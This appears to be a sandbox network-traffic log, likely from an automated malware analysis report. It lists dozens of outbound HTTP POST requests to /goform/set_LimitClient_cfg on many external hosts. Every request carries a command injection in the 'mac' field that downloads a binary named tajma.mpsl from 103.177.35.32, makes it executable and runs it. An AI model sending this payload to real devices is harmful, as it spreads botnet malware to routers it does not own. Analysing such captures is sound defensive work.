                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2486192.168.2.2344870198.123.162.128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485677004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2487192.168.2.2346094100.246.196.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485691071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2488192.168.2.2333482119.87.229.1038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485724926 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2489192.168.2.234946220.1.230.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485757113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2490192.168.2.235104498.96.163.2348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485764980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2491192.168.2.2334528193.65.102.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485764980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2492192.168.2.2358242122.8.83.1038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485784054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2493192.168.2.23330384.114.225.638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485800028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2494192.168.2.2347188134.188.207.148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485825062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2495192.168.2.2360376180.225.33.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485846996 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2496192.168.2.2354584148.85.51.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485951900 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2497192.168.2.2337836146.80.159.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485968113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2498192.168.2.234396097.12.44.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485987902 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2499192.168.2.2333190140.70.115.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485997915 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2500192.168.2.2338780126.240.5.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486076117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2501192.168.2.2341956185.73.77.2448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486088991 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2502192.168.2.235093632.188.210.1118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486114025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2503192.168.2.2333796114.197.189.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486120939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2504192.168.2.2333348135.132.122.1238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486143112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2505192.168.2.2348264173.22.0.38080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486155987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2506192.168.2.2353788200.79.246.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486217976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2507192.168.2.2346640196.77.244.1248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486234903 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2508192.168.2.235646662.134.36.2058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486244917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
